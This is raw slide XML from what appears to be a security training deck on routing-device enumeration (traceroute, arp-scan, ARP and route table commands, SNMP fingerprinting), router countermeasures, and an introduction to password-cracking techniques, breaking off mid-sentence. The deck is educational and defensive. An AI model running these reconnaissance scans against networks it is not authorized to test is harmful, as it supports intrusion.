                <a:latin typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>traceroute -6 ipv6.google.com        # IPv6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>traceroute -g </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>gatewayIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> target.com   # Route via gateway</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>traceroute -m 5 8.8.8.8              # Set max hops (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>TTL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>=5)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FA439D93-D4DC-4FFC-9590-276D1CD673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CBF6E24-E204-40BC-B3D6-D8C959F62890}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{1437824C-6879-4FBA-936A-8E09C7135D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2F1F74-0D84-4E7B-A85B-AF25D0273D29}"/>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12360750-7230-4E4E-B75F-2199007B516A}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{9B40F256-0FEF-4D65-B658-BC9FA67C41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86A820-06E8-4E34-B8C3-6DDC8E328E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{A17B007E-DEE8-4371-936E-95C9D24B18E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599DF6-9D28-405E-870C-DA9155580B34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366"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2. routing devices Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 4">
            <a:extLst>
              <a:ext uri="{22D57BB4-41DE-4537-B29A-39A67CE7599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97DD7D-CB5D-40D1-A9D7-7A2F147B451A}"/>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72143749-B4C7-4EC0-8750-07E74A21F19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896BEEB6-A1E6-4C1B-99C0-4F6FA33F63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726082-0D17-42BF-B429-8D07FFC4E091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> and MAC Table Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{EF945028-3583-4501-A5ED-63DD7F7C68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3693C2-4492-4CBD-B954-EB42F320749D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>using tools like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>-scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>, to enumerate connected devices, segment boundaries, and active hosts. MAC table queries on Layer-3 switches and routers using SNMP also reveal device manufacturers, which aids fingerprinting for specific exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Show routes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> route</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l"/>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Network scan for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>arp-scan --interface=eth0 192.168.1.0/24 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{86AD2D79-88FE-4C7B-90A1-242400F5F88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670236-8342-4EB0-AA7D-02C011997B1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{3E6F3039-D1F6-46F4-82E6-F9493036E92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CF8511E-2AC3-4347-B756-F6076DC05D03}"/>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7F393B8D-F70C-4ACE-9333-3F7856BC2483}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{43ECD8E4-7904-4226-82F0-8D3D543B5C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F18AEA3-6050-4195-BB5E-A02AA86C158C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{F93BEE4E-E3CC-459A-9C28-5D62DAC8C22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7B6CD2-B14D-4A20-8D6E-5EF1739BB94D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366"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2. routing devices Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 4">
            <a:extLst>
              <a:ext uri="{1941123C-493A-4130-9194-86B936DDC5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478390E-4681-48EB-8310-5B425EAFCAD5}"/>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76F40EA6-A9E7-4878-BA75-1A145096800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E20285B4-C8ED-4ECF-8880-BB4E9264B8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83FC789-C1DE-41EA-854D-174DE8C03AF7}"/>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Routing Devices Countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{4BE306A4-F27A-4256-A733-A15697EFFD2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65E263-1659-49F7-971E-2B23B43B392C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Disable SNMP or upgrade to SNMPv3 and use strong, unique community strings.​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Restrict management access to routers by allowing logins only from trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>IPs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> and networks.​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Use SSH with key-based authentication; disable or block Telnet everywhere.​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Implement AAA (Authentication, Authorization, Accounting) and enforce command authorization for all admin access.​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Regularly patch and update router firmware and audit enabled services/protocols, disabling those not needed.​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Segment management interfaces into isolated networks and monitor all access attempts and SNMP queries using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>SIEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>/logging tools.​</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Block unused ports (including UDP/161 for SNMP), deploy egress filtering, and monitor for unauthorized or suspicious traffic.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{58739369-E37E-415C-BBBE-76E15FFCD67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78C7EA6-FEEB-4D63-B2B6-82BAB83C68D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{75119C9F-638B-432C-A0D9-17094B7A46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D8D6ED-A7CF-4155-A9D7-E5418593843D}"/>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6BD11CD9-97D2-4FE4-A6AD-65C8002C8B93}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{119AB66B-7584-44FD-B694-4ABA54060B2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1FA05D-2B1D-4895-871E-E1206E7DBF9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="4739887"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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{986C46B7-F631-41F6-9DBB-9A55BD0512F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C4B2E5E-F57F-473B-B048-A59DE42CD5E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="257175"/>
            <a:ext cx="7953366"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2. routing devices Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 4">
            <a:extLst>
              <a:ext uri="{4EE35882-731D-43BC-8AAF-20F9940031A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7E352EE-3CF8-473C-BFC5-92DE93186293}"/>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BEC51236-2BF8-4AA0-B770-BC37C15BD6B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99C0AE94-62B3-4C06-9C10-370C398782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FB8ECF-51B8-404C-831F-525D674A193D}"/>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Definition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{7A1864B2-D7C0-4B9D-B172-B108341CF2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C213B5-5B41-4784-9894-796E78575497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Password cracking is the process of using an application program to identify an unknown or forgotten password that allows access to a computer or network resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Goal:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> The main goal of password cracking is to determine and unscramble a password, often for malicious purposes. The password may belong to a user or to an admin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Techniques:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute Force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Dictionary search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Credential stuffing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Rainbow table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{BA78ED0F-345D-46D6-80E3-3C3B232E0D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EFF7022-F0CB-4A90-A2E4-34A9F4216667}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{BF640DF2-FE5C-433B-9E95-AB73F4F81FF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F12EEB-C763-4705-B79F-95BD5D3B0F0E}"/>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9998674A-DE76-4470-996C-34251B890428}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>November 12, 2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{2210F298-26EA-40AD-BD3D-CD6D7050C41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84E0BBF-B423-43CE-A21C-56180439508D}"/>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3. Password cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 4">
            <a:extLst>
              <a:ext uri="{767576AE-18EF-4C0A-8050-A488ACC9CF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5EC98C5-BEC4-4D16-82EA-148500E44EB5}"/>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5B6DADD8-F8FB-493F-BF40-76F9ABEC70B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24BD17EB-8C32-4C44-84BE-CFC23908142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69B2EF-DEB5-4649-B585-FDE109C44FAB}"/>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Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{DDF80876-E57D-44EB-AF66-F27D125D783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4C98D8-A0F7-4907-BC5F-E9B7C9C5C52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1733550"/>
            <a:ext cx="7553068" cy="2892742"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute force attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>In cryptography, a brute-force attack or exhaustive key search is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>cryptanalytic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t> attack that consists of an attacker submitting many possible keys or passwords with the hope of eventually guessing correctly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>This technique involves trying every possible combination of characters until the correct password is found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>Brute force attacks are resource-intensive and time-consuming but can be effective if the password is weak or short.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="0" dirty="0">
              <a:latin typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="0" dirty="0">
                <a:latin typeface="Roboto"/>
              </a:rPr>
              <a:t>E.g., using </a:t>
